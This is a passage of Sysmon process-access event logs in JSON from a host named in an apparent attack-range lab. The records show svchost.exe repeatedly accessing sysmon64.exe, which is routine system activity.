C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.375","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1595,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.375\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.375","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1596,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.375\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.375","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1597,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.392\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.392","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1598,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.392\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.392","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1599,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.392\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.392","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1600,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.392\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.392","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1601,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.392\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.392","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1602,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.392\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 